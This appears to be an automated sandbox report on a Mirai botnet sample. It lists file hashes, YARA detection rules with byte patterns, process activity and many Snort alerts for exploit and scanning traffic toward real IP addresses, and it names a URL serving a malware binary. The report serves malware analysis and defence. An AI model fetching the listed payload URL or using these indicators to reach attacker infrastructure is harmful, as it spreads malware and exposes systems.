Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
pjT3uuMrF1

Overview

General Information

Sample Name:pjT3uuMrF1
Analysis ID:626439
MD5:e8511d7655b6bb7a2e95a8a71945c87f
SHA1:0d946d9f597a16bead0e8df270902105fe3662af
SHA256:156bf5a274c0b19bb4941117a16e7c9be568d70c811199086145df079be80b36
Tags:32armelfmirai
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample contains only a LOAD segment without any section mappings
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
HTTP GET or POST without a user agent
Executes the "rm" command used to delete files or directories

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:626439
Start date and time: 14/05/202202:18:532022-05-14 02:18:53 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 26s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:pjT3uuMrF1
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal92.spre.troj.evad.lin@0/0@0/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: http://103.136.43.52/bins/Tsunami.x86
Command:/tmp/pjT3uuMrF1
PID:6230
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
kebabware installed
Standard Error:
  • system is lnxubuntu20
  • pjT3uuMrF1 (PID: 6230, Parent: 6125, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/pjT3uuMrF1
  • sh (PID: 6287, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • rm (PID: 6317, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
  • cleanup
SourceRuleDescriptionAuthorStrings
pjT3uuMrF1SUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x807c:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x80eb:$s2: $Id: UPX
  • 0x809c:$s3: $Info: This file is packed with the UPX executable packer
SourceRuleDescriptionAuthorStrings
6234.1.0000000031c29fda.00000000517a471f.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x14f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x1560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x1620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6230.1.0000000031c29fda.00000000517a471f.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x14f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x1560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x1620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x14028:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x14084:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x14120:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
  • 0x132cc:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    Click to see the 5 entries
    Timestamp:192.168.2.23172.255.83.10051174555552027153 05/14/22-02:19:57.628001
    SID:2027153
    Source Port:51174
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.143.204.23852402802027121 05/14/22-02:19:59.979425
    SID:2027121
    Source Port:52402
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.136.115.7450126802027121 05/14/22-02:21:11.764865
    SID:2027121
    Source Port:50126
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23197.246.194.22653566372152835222 05/14/22-02:21:39.028446
    SID:2835222
    Source Port:53566
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.81.17953844555552027153 05/14/22-02:19:59.137951
    SID:2027153
    Source Port:53844
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.234.231.22957116528692027339 05/14/22-02:20:29.429465
    SID:2027339
    Source Port:57116
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.177.8248362555552027153 05/14/22-02:21:10.452251
    SID:2027153
    Source Port:48362
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.142.64.15133610802027121 05/14/22-02:19:53.342712
    SID:2027121
    Source Port:33610
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.139.9459572802027121 05/14/22-02:21:32.727426
    SID:2027121
    Source Port:59572
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.211.103.15238686802027121 05/14/22-02:19:47.512944
    SID:2027121
    Source Port:38686
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.31.7.6547324802027121 05/14/22-02:20:02.461488
    SID:2027121
    Source Port:47324
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.238.12554388555552027153 05/14/22-02:20:08.992019
    SID:2027153
    Source Port:54388
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.189.104.13841018802027121 05/14/22-02:20:32.218131
    SID:2027121
    Source Port:41018
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.61.121.20644906802027121 05/14/22-02:20:03.803878
    SID:2027121
    Source Port:44906
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.240.22653848802027121 05/14/22-02:21:23.038728
    SID:2027121
    Source Port:53848
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.187.12539084555552027153 05/14/22-02:20:37.047910
    SID:2027153
    Source Port:39084
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.216.169.9635526802027121 05/14/22-02:20:28.438174
    SID:2027121
    Source Port:35526
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.9.211.13445804802027121 05/14/22-02:20:50.335116
    SID:2027121
    Source Port:45804
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.159.0.20360034802027121 05/14/22-02:20:28.556099
    SID:2027121
    Source Port:60034
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.159.7.3947180802027121 05/14/22-02:21:16.327351
    SID:2027121
    Source Port:47180
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.29.18036084802027121 05/14/22-02:20:48.149836
    SID:2027121
    Source Port:36084
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.109.12442672555552027153 05/14/22-02:21:06.678651
    SID:2027153
    Source Port:42672
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.80.25057792555552027153 05/14/22-02:19:50.996196
    SID:2027153
    Source Port:57792
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.203.18340090555552027153 05/14/22-02:19:57.645189
    SID:2027153
    Source Port:40090
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.244.124.6254780528692027339 05/14/22-02:21:19.394819
    SID:2027339
    Source Port:54780
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.65.111.19238106802027121 05/14/22-02:20:56.002880
    SID:2027121
    Source Port:38106
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.250.91.13145570528692027339 05/14/22-02:20:29.395003
    SID:2027339
    Source Port:45570
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.159.33.21456926802027121 05/14/22-02:20:54.820107
    SID:2027121
    Source Port:56926
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.234.19437462555552027153 05/14/22-02:19:47.505957
    SID:2027153
    Source Port:37462
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2398.159.33.19449528555552027153 05/14/22-02:20:13.406392
    SID:2027153
    Source Port:49528
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.216.8.6260662802027121 05/14/22-02:20:26.047138
    SID:2027121
    Source Port:60662
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.60.11932814802027121 05/14/22-02:19:52.635703
    SID:2027121
    Source Port:32814
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.107.229.3633744802027121 05/14/22-02:21:14.075300
    SID:2027121
    Source Port:33744
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.4.7238672555552027153 05/14/22-02:20:18.663856
    SID:2027153
    Source Port:38672
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.245.84.15734900802027121 05/14/22-02:20:23.687567
    SID:2027121
    Source Port:34900
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.164.5855826802027121 05/14/22-02:20:39.296946
    SID:2027121
    Source Port:55826
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.215.239.14640644802027121 05/14/22-02:21:03.782018
    SID:2027121
    Source Port:40644
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.179.202.20535652802027121 05/14/22-02:20:29.974289
    SID:2027121
    Source Port:35652
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.65.49.22848088802027121 05/14/22-02:20:28.494212
    SID:2027121
    Source Port:48088
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.155.7835938555552027153 05/14/22-02:20:03.389982
    SID:2027153
    Source Port:35938
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.28.18837548555552027153 05/14/22-02:21:10.434822
    SID:2027153
    Source Port:37548
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.56.217.14057738802027121 05/14/22-02:20:32.203958
    SID:2027121
    Source Port:57738
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.124.21940064802027121 05/14/22-02:21:03.799358
    SID:2027121
    Source Port:40064
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.135.200.3347048802027121 05/14/22-02:20:26.004599
    SID:2027121
    Source Port:47048
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.163.168.10943244802027121 05/14/22-02:20:50.298257
    SID:2027121
    Source Port:43244
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.254.2849556555552027153 05/14/22-02:20:53.942992
    SID:2027153
    Source Port:49556
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23197.237.77.4548226372152835222 05/14/22-02:21:12.221258
    SID:2835222
    Source Port:48226
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.28.223.12760158802027121 05/14/22-02:19:54.571832
    SID:2027121
    Source Port:60158
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.208.22147180555552027153 05/14/22-02:21:15.003517
    SID:2027153
    Source Port:47180
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.141.209.23753648802027121 05/14/22-02:21:16.255320
    SID:2027121
    Source Port:53648
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.173.17642360802027121 05/14/22-02:19:59.979314
    SID:2027121
    Source Port:42360
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.254.19839484555552027153 05/14/22-02:19:49.942206
    SID:2027153
    Source Port:39484
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.156.25245090802027121 05/14/22-02:20:55.948104
    SID:2027121
    Source Port:45090
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.100.2259092555552027153 05/14/22-02:20:55.145336
    SID:2027153
    Source Port:59092
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23112.121.177.22134130802027121 05/14/22-02:20:44.359761
    SID:2027121
    Source Port:34130
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.159.51.2953666802027121 05/14/22-02:19:52.694475
    SID:2027121
    Source Port:53666
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.215.101.8160170802027121 05/14/22-02:20:38.895103
    SID:2027121
    Source Port:60170
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.22.16334682802027121 05/14/22-02:21:28.995999
    SID:2027121
    Source Port:34682
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.165.133.14534562802027121 05/14/22-02:20:37.016015
    SID:2027121
    Source Port:34562
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.220.15233210555552027153 05/14/22-02:19:47.522649
    SID:2027153
    Source Port:33210
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.226.9456510555552027153 05/14/22-02:20:26.128722
    SID:2027153
    Source Port:56510
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.98.6846890555552027153 05/14/22-02:20:51.595727
    SID:2027153
    Source Port:46890
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2398.159.224.1937196555552027153 05/14/22-02:21:10.525505
    SID:2027153
    Source Port:37196
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.100.9050666802027121 05/14/22-02:20:07.909211
    SID:2027121
    Source Port:50666
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.173.188.1753452802027121 05/14/22-02:21:16.301756
    SID:2027121
    Source Port:53452
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.163.40.13056302802027121 05/14/22-02:20:17.767623
    SID:2027121
    Source Port:56302
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.205.61.15945412802027121 05/14/22-02:21:23.140530
    SID:2027121
    Source Port:45412
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.152.9160996802027121 05/14/22-02:21:29.005358
    SID:2027121
    Source Port:60996
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.106.58.15039318802027121 05/14/22-02:20:02.405864
    SID:2027121
    Source Port:39318
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.179.60.10652164802027121 05/14/22-02:19:47.485907
    SID:2027121
    Source Port:52164
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.14.21637572802027121 05/14/22-02:20:40.548225
    SID:2027121
    Source Port:37572
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.70.15634830555552027153 05/14/22-02:21:29.853316
    SID:2027153
    Source Port:34830
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.241.119.16751336528692027339 05/14/22-02:21:38.199643
    SID:2027339
    Source Port:51336
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.234.11157896802027121 05/14/22-02:20:26.254878
    SID:2027121
    Source Port:57896
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.233.22.20254454802027121 05/14/22-02:19:59.937809
    SID:2027121
    Source Port:54454
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.111.244.25339608802027121 05/14/22-02:20:58.081431
    SID:2027121
    Source Port:39608
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.140.156.4346396802027121 05/14/22-02:20:48.022368
    SID:2027121
    Source Port:46396
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.242.10450832802027121 05/14/22-02:19:54.491456
    SID:2027121
    Source Port:50832
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.97.132.13055154555552027153 05/14/22-02:19:45.321580
    SID:2027153
    Source Port:55154
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.161.182.236966802027121 05/14/22-02:20:39.165687
    SID:2027121
    Source Port:36966
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.223.15134538802027121 05/14/22-02:20:15.032748
    SID:2027121
    Source Port:34538
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.57.74.3350396802027121 05/14/22-02:19:54.640711
    SID:2027121
    Source Port:50396
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.215.8660962802027121 05/14/22-02:20:20.205596
    SID:2027121
    Source Port:60962
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.5.4944762555552027153 05/14/22-02:20:15.566625
    SID:2027153
    Source Port:44762
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.121.5748134802027121 05/14/22-02:20:47.995507
    SID:2027121
    Source Port:48134
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.146.5845536555552027153 05/14/22-02:20:53.942910
    SID:2027153
    Source Port:45536
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.159.55.16432974802027121 05/14/22-02:20:28.550766
    SID:2027121
    Source Port:32974
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.152.19558680555552027153 05/14/22-02:21:15.003655
    SID:2027153
    Source Port:58680
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.101.50.2936210802027121 05/14/22-02:20:58.196781
    SID:2027121
    Source Port:36210
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.245.84.20155974555552027153 05/14/22-02:20:21.837542
    SID:2027153
    Source Port:55974
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.211.3.4758028802027121 05/14/22-02:21:11.754876
    SID:2027121
    Source Port:58028
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.46.16736878555552027153 05/14/22-02:20:26.128840
    SID:2027153
    Source Port:36878
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.61.121.20644884802027121 05/14/22-02:20:02.452312
    SID:2027121
    Source Port:44884
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.32.13358682802027121 05/14/22-02:20:12.238521
    SID:2027121
    Source Port:58682
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.79.32.4242658802027121 05/14/22-02:20:23.608445
    SID:2027121
    Source Port:42658
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.123.20540996802027121 05/14/22-02:21:00.525492
    SID:2027121
    Source Port:40996
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.255.11347180555552027153 05/14/22-02:19:54.382118
    SID:2027153
    Source Port:47180
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.214.235.12633216802027121 05/14/22-02:20:07.909063
    SID:2027121
    Source Port:33216
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.224.25.14240106528692027339 05/14/22-02:20:47.247262
    SID:2027339
    Source Port:40106
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.87.254.4357278802027121 05/14/22-02:19:53.372300
    SID:2027121
    Source Port:57278
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.131.149.11457714802027121 05/14/22-02:21:34.904086
    SID:2027121
    Source Port:57714
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.147.8037940802027121 05/14/22-02:20:37.002920
    SID:2027121
    Source Port:37940
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.85.8852956802027121 05/14/22-02:20:58.119066
    SID:2027121
    Source Port:52956
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.97.12843836555552027153 05/14/22-02:21:31.954750
    SID:2027153
    Source Port:43836
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.143.229.4937410802027121 05/14/22-02:20:47.942900
    SID:2027121
    Source Port:37410
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.231.18936138555552027153 05/14/22-02:20:26.126595
    SID:2027153
    Source Port:36138
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.245.77.5443396555552027153 05/14/22-02:19:50.861365
    SID:2027153
    Source Port:43396
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.101.96.21634304802027121 05/14/22-02:21:00.513758
    SID:2027121
    Source Port:34304
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.215.170.3138548802027121 05/14/22-02:20:52.527746
    SID:2027121
    Source Port:38548
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.252.56.12541832802027121 05/14/22-02:21:34.895934
    SID:2027121
    Source Port:41832
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.58.75.10847170802027121 05/14/22-02:21:11.847346
    SID:2027121
    Source Port:47170
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.159.30.9250334802027121 05/14/22-02:21:25.371312
    SID:2027121
    Source Port:50334
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.131.136.6544472802027121 05/14/22-02:20:26.033464
    SID:2027121
    Source Port:44472
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.142.75.18149820802027121 05/14/22-02:20:55.954772
    SID:2027121
    Source Port:49820
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.241.13.9738248528692027339 05/14/22-02:19:49.315222
    SID:2027339
    Source Port:38248
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.227.11452622555552027153 05/14/22-02:21:06.661307
    SID:2027153
    Source Port:52622
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.225.159.18250730528692027339 05/14/22-02:20:25.835892
    SID:2027339
    Source Port:50730
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.209.146.21050540802027121 05/14/22-02:20:38.689489
    SID:2027121
    Source Port:50540
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.163.13350650555552027153 05/14/22-02:20:39.493185
    SID:2027153
    Source Port:50650
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.213.40.556526802027121 05/14/22-02:20:28.445974
    SID:2027121
    Source Port:56526
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.180.165.20354376802027121 05/14/22-02:20:29.989309
    SID:2027121
    Source Port:54376
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.166.120.7254750802027121 05/14/22-02:21:23.057590
    SID:2027121
    Source Port:54750
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.255.80.660084555552027153 05/14/22-02:20:08.975191
    SID:2027153
    Source Port:60084
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.101.238.3342720802027121 05/14/22-02:20:17.717017
    SID:2027121
    Source Port:42720
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.179.156.2557406802027121 05/14/22-02:20:02.429434
    SID:2027121
    Source Port:57406
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.210.22652942802027121 05/14/22-02:20:35.416113
    SID:2027121
    Source Port:52942
    Destination Port:80
    Protocol:TCP
